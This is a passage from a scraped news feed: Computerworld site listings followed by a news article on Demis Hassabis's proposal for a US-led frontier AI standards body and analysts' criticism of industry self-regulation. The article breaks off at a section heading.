							<svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
								<use xlink:href="#icon-chevron-up"></use>
							</svg>
						</span>
					</button>
				</div></div><div class="col-6 col-4@md content-listing-articles__button-view-all">
						<a class="button" href="https://www.computerworld.com/artificial-intelligence/feed/page/2/" target="_blank"> View all </a></div></div></div></div><section class="suggested-content-upcoming-events"><div class="container">
				<h2 class="suggested-content-upcoming-events__title">Upcoming Events</h2><a class="grid suggested-content-upcoming-events__item" href="https://event.foundryco.com/cio-100-uk/" aria-label="Go to content"><div class="col-12 col-3@md suggested-content-upcoming-events__date-label dd"><span class="date-label">Sep/24</span></div><div class="col-12 col-4@md col-5@xl suggested-content-upcoming-events__image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/03/4141846-0-37933000-1772809522-CIO-Summit-2025_17.jpg?quality=50&amp;strip=all&amp;w=1045" alt="Image"></div></div>
			<div class="col-12 col-5@md col-4@xl suggested-content-upcoming-events__card">
				<div class="card card--xl">
					<div class="card__header"><span class="card__content-type">conference</span><span class="card__external-link-icon" data-url="https://event.foundryco.com/cio-100-uk/"><svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <use xlink:href="#icon-arrow-up-right-from-square"></use></svg></span></div><h3 class="card__title">CIO 100 Awards &amp; Conference UK</h3><div class="card__info card__info--light"><span>24 Sep 2026</span><span>London, UK</span></div>
		<div class="card__tags"><span class="card__tag"><span class="tag">Microsoft 365</span></span></div></div>
			</div>
		</a><a class="grid suggested-content-upcoming-events__item" href="https://event.foundryco.com/cso-awards-conference-uk/" aria-label="Go to content"><div class="col-12 col-3@md suggested-content-upcoming-events__date-label dd"><span class="date-label">Nov/26</span></div><div class="col-12 col-4@md col-5@xl suggested-content-upcoming-events__image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4141741-0-97812100-1780312469-60CB82BE-5D6E-40E0-8E5E-0151C8C46E7F.jpg?quality=50&amp;strip=all&amp;w=929" alt="Image"></div></div>
			<div class="col-12 col-5@md col-4@xl suggested-content-upcoming-events__card">
				<div class="card card--xl">
					<div class="card__header"><span class="card__content-type">conference</span><span class="card__external-link-icon" data-url="https://event.foundryco.com/cso-awards-conference-uk/"><svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <use xlink:href="#icon-arrow-up-right-from-square"></use></svg></span></div><h3 class="card__title">CSO Awards &amp; Conference UK</h3><div class="card__info card__info--light"><span>26 Nov 2026</span><span>London, UK</span></div>
		<div class="card__tags"><span class="card__tag"><span class="tag">Cyberattacks</span></span></div></div>
			</div>
		</a></div><div class="suggested-content-upcoming-events__button-container container">
						<a class="button" href="https://www.computerworld.com/events/"> View all events</a>
					</div>
				
			</section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><section class="related-content-resources">
				<div class="container">
				<h2 class="related-content-resources__title">Resources</h2><div class="grid related-content-resources__content"><div class="col-12 col-7@md col-8@lg grid grid--cols-7@md grid--cols-8@lg related-content-resources__main-content">
			<div class="col-12 col-7@md col-6@lg">
				<a class="card card--xxl" href="https://us.resources.computerworld.com/resources/accelerate-your-cloud-migration-with-atlassian-fastshift-6?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
					<div class="card__header">
						<span class="card__content-type">whitepaper</span>
					</div>
					<h3 class="card__title">Accelerate your cloud migration with Atlassian FastShift</h3>
					<p class="card__description"></p><p>Turn an Atlassian cloud migration into a faster, more predictable transformation. In this session, you’ll walk through the FastShift playbook.</p>
<p>The post <a rel="nofollow" href="https://com.wp.idg.zone/resources/accelerate-your-cloud-migration-with-atlassian-fastshift-6/">Accelerate your cloud migration with Atlassian FastShift</a> appeared first on <a rel="nofollow" href="https://com.wp.idg.zone/">Whitepaper Repository –</a>.</p>

					<div class="card__info">
						<span>
						By 
						Atlassian
						</span>
					</div>
					<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
			</div>
			<div class="col-2 related-content-resources__featured-image-wrapper">
				<img width="400px" loading="lazy" class="related-content-resources__image-featured" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040704.83.png" alt="Image">
			</div>
		</div><div class="col-12 col-5@md col-4@lg col-start-9@lg related-content-resources__cards"><div class="grid grid--cols-5@md grid--cols-4@lg related-content-resources__card-wrapper">
				<div class="col-12 col-5@md col-3@lg">
					<a class="card card--sm" href="https://us.resources.computerworld.com/resources/warum-sich-teams-fur-cloud-entscheiden-9?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
						<div class="card__header">
							<span class="card__content-type">whitepaper</span>
						</div>
						<h3 class="card__title">Warum sich Teams für Cloud entscheiden</h3>
						<div class="card__info">
							<span>
							By 
							Atlassian
							</span>
						</div>
						<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
				</div>
				<div class="col-1">
					<img width="400px" loading="lazy" class="related-content-resources__image-side" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040716.4772.png" alt="Image">
				</div>
			</div><div class="grid grid--cols-5@md grid--cols-4@lg related-content-resources__card-wrapper">
				<div class="col-12 col-5@md col-3@lg">
					<a class="card card--sm" href="https://us.resources.computerworld.com/resources/pourquoi-les-equipes-optent-pour-la-solution-cloud-3?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
						<div class="card__header">
							<span class="card__content-type">whitepaper</span>
						</div>
						<h3 class="card__title">Pourquoi les équipes optent pour la solution cloud</h3>
						<div class="card__info">
							<span>
							By 
							Atlassian
							</span>
						</div>
						<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
				</div>
				<div class="col-1">
					<img width="400px" loading="lazy" class="related-content-resources__image-side" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040728.9116.png" alt="Image">
				</div>
			</div></div>
		</div><div class="related-content-resources__button-container">
			<a class="button" target="_blank" href="https://us.resources.computerworld.com/"> View all </a>
		</div></div>
			</section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><section class="related-content-podcasts"><div class="container"><h2 class="related-content-podcasts__title">Podcasts</h2><div class="grid related-content-podcasts__content"><a class="col-12 col-7@md col-8@lg grid grid--cols-7@md grid--cols-8@lg related-content-podcasts__main-content" href="https://www.computerworld.com/podcasts/2-minute-tech-briefing/" aria-label="Go to content"><div class="col-12 col-7@md col-2@lg related-content-podcasts__image">
			<div class="image image--aspect-ratio-1-1">
				<img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2025/11/100065453-0-01782600-1762961273-2-min-tech-briefing-logo-16x9-4.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Image">
			</div>
		</div><div class="col-12 col-7@md col-6@lg"><div class="card card--xl"><div class="card__header"><span class="card__content-type"> podcasts</span></div><h3 class="card__title">2-Minute Tech Briefing</h3><p class="card__description">Catch up on the latest enterprise IT news in a fast-paced video briefing with host Arnold Davick. Listen to the show on Computerworld, YouTube, Apple and Spotify.</p><div class="card__info card__info--light"><span>81  episodes</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Emerging Technology</span></span></div></div></div></a><ul class="col-12 col-5@md col-4@lg col-start-9@lg related-content-podcasts__cards"><li class="related-content-podcasts__card"><a href="https://www.computerworld.com/podcast/4176380/microsoft-copilot-growth-claudebleed-risk-linkedin-gdpr-complaint-ep-84.html" aria-label="Go to episode"><div class="related-content-podcasts__episode-label">
			<span class="episode-label">
				<span> Ep. 81</span>
				<span>
				<svg class="icon" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
					<use xlink:href="#icon-podcast"></use>
				</svg>
			</span>
			</span>
		</div><div class="card card--xs"><h3 class="card__title">Microsoft Copilot Growth, ClaudeBleed Risk, LinkedIn GDPR Complaint | Ep. 84</h3><div class="card__info">
				<span>By Arnold Davick</span>
			</div><div class="card__info card__info--light">
			<span>Mar 20, 2024</span><span>2 mins</span>
		</div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></a></li><li class="related-content-podcasts__card"><a href="https://www.computerworld.com/podcast/4176367/chrome-gemini-ai-agents-cisa-infrastructure-cyber-resilience-ep-83.html" aria-label="Go to episode"><div class="related-content-podcasts__episode-label">
			<span class="episode-label">
				<span> Ep. 80</span>
				<span>
				<svg class="icon" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
					<use xlink:href="#icon-podcast"></use>
				</svg>
			</span>
			</span>
		</div><div class="card card--xs"><h3 class="card__title">Chrome Gemini, AI Agents, CISA Infrastructure Cyber Resilience | Ep. 83</h3><div class="card__info">
				<span>By Arnold Davick</span>
			</div><div class="card__info card__info--light">
			<span>Mar 20, 2024</span><span>2 mins</span>
		</div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></a></li></ul></div></div></section><section class="related-content-video"><div class="container"><h2 class="related-content-video__title">Video on demand</h2><div class="grid related-content-video__main">        <div class="col-12 col-4@lg related-content-video__main-card card card--xl">
            <div class="card__header"><span class="card__content-type">video</span></div>            
            <a class="card card--xl" href="https://www.computerworld.com/video/4196734/why-ai-agents-fail-when-enterprises-dont-define-the-job.html" aria-label="Go to content">
                <h3 class="card__title">Why AI agents fail when enterprises don’t define the job</h3>            </a>
                            <p class="card__description mt-3">Enterprises are investing heavily in AI agents, but many projects fail when companies skip clear goals, guardrails, governance and success metrics.</p>
            
                         <div class="card__info card__info--light"><span>Jul 14, 2026 </span><span>33 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">IT Governance</span></span></div>        </div>
                <div class="col-12 col-8@lg related-content-video__video">
                            <div class="youtube-video">
                    &gt;
					
				</div>                </div>
                    </div>
        </div><div class="related-content-video__cards-container">
                        <div class="related-content-video__cards-wrap">
                            <ul class="grid related-content-video__cards">        <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4193952/why-enterprise-ai-projects-stall-before-delivering-real-value.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4193952-0-52301800-1783446508-youtube-thumbnail-gu6x40jhZ1s_3cbf50.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">Why enterprise AI projects stall before delivering real value</h3>
                                         <div class="card__info card__info--light"><span>Jul 7, 2026 </span><span>29 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">ROI and Metrics</span></span></div>                </div>
            </a>
        </li>
                <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4191262/how-ai-is-breaking-job-interviews-skills-testing-and-evaluation.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4191262-0-24248500-1782847008-youtube-thumbnail-lVEejCXC4lU_b223c5.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">How AI is breaking job interviews, skills testing and evaluation</h3>
                                         <div class="card__info card__info--light"><span>Jun 30, 2026 </span><span>32 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Hiring</span></span><span class="card__tag"><span class="tag">IT Skills and Training</span></span></div>                </div>
            </a>
        </li>
                <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4188534/how-ai-is-reshaping-cybersecurity.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4188534-0-45176600-1782243369-youtube-thumbnail-5DLoQMU0nZc_de9df9.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">How AI is reshaping cybersecurity</h3>
                                         <div class="card__info card__info--light"><span>Jun 23, 2026 </span><span>44 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Cyberattacks</span></span><span class="card__tag"><span class="tag">Cybercrime</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div>                </div>
            </a>
        </li>
        </ul></div></div><div class="related-content-video__button-container"><a class="button" target="_self" href="https://www.computerworld.com/videos/">See all videos</a></div></section></div><section class="suggested-content-various"><div class="container"><div class="grid suggested-content-various__content"><div class="col-12 col-3@lg">
			<h2 class="suggested-content-various__title">Show me more</h2><div class="suggested-content-various__filters"><span class="suggested-content-various__filter"><button class="chip chip--filter chip--active" type="button" data-filter-key="latest">Latest</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="article">Articles</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="podcast">Podcasts</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="video">Videos</button></span></div>
		</div><div class="col-12 col-9@lg suggested-content-various__items-wrap"><div class="grid grid--cols-9@lg suggested-content-various__items"><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4195055/apple-finally-calls-time-on-15-year-old-device-support.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">opinion</span> </div> <h3 class="card__title">Apple finally calls time on 15-year-old device support</h3> <div class="card__info"><span>By Jonny Evans</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T16:15:14+00:00">Jul 9, 2026</span><span>4 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Smartphones</span></span><span class="card__tag"><span class="tag">iPhone</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4195055-0-47500100-1783613766-iPhone4s_3up_Photo_Siri_Sprgbd_PRINT.jpg?quality=50&amp;strip=all&amp;w=219" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4194931/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">brandpost</span> <span class="card__sponsor-text">Sponsored by Tether</span></div> <h3 class="card__title">Physical AI will see the fusion of robotics and AI transform the world</h3> <div class="card__info"><span>By tether</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T11:11:53+00:00">9 Jul 2026</span><span>6 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4194931-0-76347600-1783595551-QVAC-Paid-Ad-1-_-1200-x-800.png?w=375" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4194914/spacexai-launches-grok-4-5-touts-lower-coding-task-costs-than-ai-rivals-2.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">news</span> </div> <h3 class="card__title">SpaceXAI launches Grok 4.5, touts lower coding-task costs than AI rivals</h3> <div class="card__info"><span>By Prasanth Aby Thomas</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T10:26:11+00:00">Jul 9, 2026</span><span>5 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Developer</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4194914-0-24417700-1783592810-AI-vibe-coding-one-hand-is-robot-one-hand-is-human.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4176380/microsoft-copilot-growth-claudebleed-risk-linkedin-gdpr-complaint-ep-84.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">Microsoft Copilot Growth, ClaudeBleed Risk, LinkedIn GDPR Complaint | Ep. 84</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-22T15:04:16+00:00">May 22, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-46106000-1779462321-youtube-thumbnail-5PkKYThsKy8.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4176367/chrome-gemini-ai-agents-cisa-infrastructure-cyber-resilience-ep-83.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">Chrome Gemini, AI Agents, CISA Infrastructure Cyber Resilience | Ep. 83</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-22T14:53:18+00:00">May 22, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-06017100-1779461653-youtube-thumbnail-XH7vduM7uz8.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4172579/ai-triage-gains-model-reviews-ask-jeeves-shutdown-ep-82.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">AI Triage Gains, Model Reviews, Ask Jeeves Shutdown | Ep. 82</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-18T19:31:15+00:00">May 18, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-62824900-1779132751-youtube-thumbnail-P3R6blMndrU.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4185559/why-ai-agents-could-create-a-new-control-and-security-crisis.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">Why AI agents could create a new control and security crisis</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-16T11:47:15+00:00">Jun 16, 2026</span><span>28 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">IT Governance</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4185559-0-48713800-1781610470-youtube-thumbnail-uPpd9EJ4iNI_55eb26.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4182978/does-quality-suffer-when-ai-generates-code.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">Does quality suffer when AI generates code?</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-09T14:32:51+00:00">Jun 9, 2026</span><span>35 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Code Security</span></span><span class="card__tag"><span class="tag">Developer</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4182978-0-61230000-1781015610-youtube-thumbnail-1hAfDQkuyhs_faa994.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4180043/what-happens-when-ai-starts-selling-to-ai.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">What happens when AI starts selling to AI?</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-02T15:00:42+00:00">Jun 2, 2026</span><span>38 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Procurement Software</span></span><span class="card__tag"><span class="tag">Salesforce Automation </span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4180043-0-78180900-1780412479-youtube-thumbnail-jPv-TAenlto_c79318.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div></div></div></div></div></section>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepMind CEO again pushes for a frontier AI standards body]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis on Tuesday reiterated his push for an AI industry self-regulation effort, led by the US government, that is particularly focused on artificial general intelligence (AGI) and national security. 



But it is precisely that focus on national security that may make...]]></description>
<link>https://tsecurity.de/de/3671860/it-nachrichten/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671860/it-nachrichten/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body/</guid>
<pubDate>Wed, 15 Jul 2026 23:01:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google DeepMind CEO Demis Hassabis on Tuesday reiterated his push for an AI industry self-regulation effort, led by the US government, that is particularly focused on <a href="https://www.computerworld.com/article/4174181/google-talks-singularity-while-scaling-up-agentic-ai-for-enterprises-2.html" target="_blank">artificial general intelligence (AGI)</a> and national security. </p>



<p class="wp-block-paragraph">But it is precisely that focus on national security that may make the results of such an effort, assuming it happens, less than palatable outside of the US.</p>



<p class="wp-block-paragraph">“The rapid progress we’re seeing in AI requires a new approach to testing frontier AI model capabilities that is dynamic, adaptable, and rigorous,” <a href="https://demishassabis.substack.com/p/a-framework-for-frontier-ai-and-the-dawning-of-a-new-age" target="_blank" rel="noreferrer noopener">Hassabis wrote</a>. “The US is well positioned, given its economic and technical standing, to take the first step in developing such a framework. It could establish a new Standards Body modelled on a federally overseen public-private partnership or self-regulatory organization, much like the Financial Industry Regulatory Authority (FINRA), with a board that includes independent leading technical experts and open-source representatives.”</p>



<p class="wp-block-paragraph">He noted, however, that the funding would need to be substantial, and would most likely come from industry, to allow the new body to attract world-class technical talent and obtain the necessary compute resources for large-scale testing.</p>



<p class="wp-block-paragraph">Hassabis said he would propose that the organization “be responsible for developing assessment protocols and working with appropriate federal agencies and the US National Labs to conduct testing in areas relevant to national security,” and that AI vendor participants would be encouraged to adopt best practices, such as publishing model cards with technical details, maintaining strong internal cybersecurity, vetting key personnel, and providing sufficient resourcing for safety and security research.</p>



<p class="wp-block-paragraph">This is not the first time Hassabis has <a href="https://www.computerworld.com/article/4178398/deepmind-ceo-agi-could-be-here-in-three-years.html" target="_blank">expressed worries about AGI</a>. He has already worked on <a href="https://www.cio.com/article/4168122/us-government-agency-to-safety-test-frontier-ai-models-before-release.html" target="_blank">a US government initiative evaluating AI safety</a>, which involved DeepMind, Microsoft and xAI (now SpaceXAI) working with the Center for AI Standards and Innovation (CAISI), a division of the US Department of Commerce. It allowed CAISI to conduct pre-deployment evaluations and targeted research to “better assess frontier AI capabilities and advance the state of AI security.”  </p>



<h2 class="wp-block-heading">The rest of the world may have concerns</h2>



<p class="wp-block-paragraph">Analysts and consultants were mixed about the move, with most expressing concerns about whether an industry-focused group would prioritize the public’s best interests.</p>



<p class="wp-block-paragraph">“Self-regulation is not viable because it implies everyone is able to regulate themselves and will do so in line with the best interests of the public. Most tech vendors don’t have the capacity to self-regulate. They would just prefer a set of rules within which they can operate,” said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>. “For-profit organizations are required to do what is best for their shareholders, and external regulation ensures that those organizations are never in a conflict of interest where they have to choose between what is good for their shareholders and what is good for the public.”</p>



<p class="wp-block-paragraph">And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, given the international nature of AI models, an effort coordinated by the US government might alienate other countries. </p>



<p class="wp-block-paragraph">“National security is the proposal’s accelerator in Washington and its poison pill abroad: the framing that opens the only gate available at home invites foreign capitals to read the institution as an instrument of American strategy,” he pointed out. </p>



<p class="wp-block-paragraph">“The map is already plural,” he said. “Brussels switches on enforcement powers over general-purpose models [starting in August 2026], London runs the AI Security Institute, and Beijing licenses on its own terms. California and New York have legislated for frontier models at home. The durable route is shared technical evidence with sovereign enforcement, sealed through mutual recognition rather than deference, with India and the other major non-Western markets holding authorship rather than seats.”</p>



<p class="wp-block-paragraph">Gogia added that the rules enacted by even such a group may not address all of the key concerns of enterprise IT. A US government effort along the lines that Hassabis is proposing would result in testing that “sits close to intelligence and industrial policy, and those functions will not stay neatly separated. A model can pass every catastrophic-risk test and still fail the enterprise on privacy, reliability, and liability,” he noted.</p>



<p class="wp-block-paragraph">Walmart’s former director of cybersecurity <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, who is now an independent cybersecurity consultant, said he found the proposal “well-intentioned, but it addresses a highly polarized topic at a time when commercial interests carry unprecedented political influence, which is not always applied benevolently.”</p>



<p class="wp-block-paragraph">He added, “an exclusive US standard that is not globally respected or enforceable would likely fail to achieve its core purpose and would place US companies at a competitive disadvantage.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, said that a deep dive into how <a href="https://www.finra.org/" target="_blank" rel="noreferrer noopener">FINRA</a> operates today is illustrative of what IT leaders can expect from this effort, assuming the industry adopts that model.</p>



<p class="wp-block-paragraph">“When the CEOs of the five companies that would be regulated are also the primary drafters of the standards, the standards will reflect those companies’ interests. FINRA has an independent board, but the operational reality is that member firm perspectives dominate the working groups that write the actual rules,” he said. “There is no reason to expect an AI equivalent to work differently, and every reason to expect it to work worse, because AI standardization is happening faster than any industry has ever attempted to standardize itself, and speed is the enemy of independent oversight.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was even more emphatically opposed to the Hassabis proposal.</p>



<p class="wp-block-paragraph">“Asking Big Tech companies to self-police is analogous to allowing foxes to guard the henhouse. It hasn’t worked to date, and it won’t work going forward. Expecting these organizations to somehow change their ways at this point in time represents the height of naïve thinking,” Levy said. “The framework proposed by Demis Hassabis is a self-serving roadmap for an industry bent on racing to the AI horizon regardless of the harms caused along the way. It is impossible to quantify the dangers to broader society should frameworks allowing self-regulation become the norm.”</p>



<h2 class="wp-block-heading">Some love the proposal</h2>



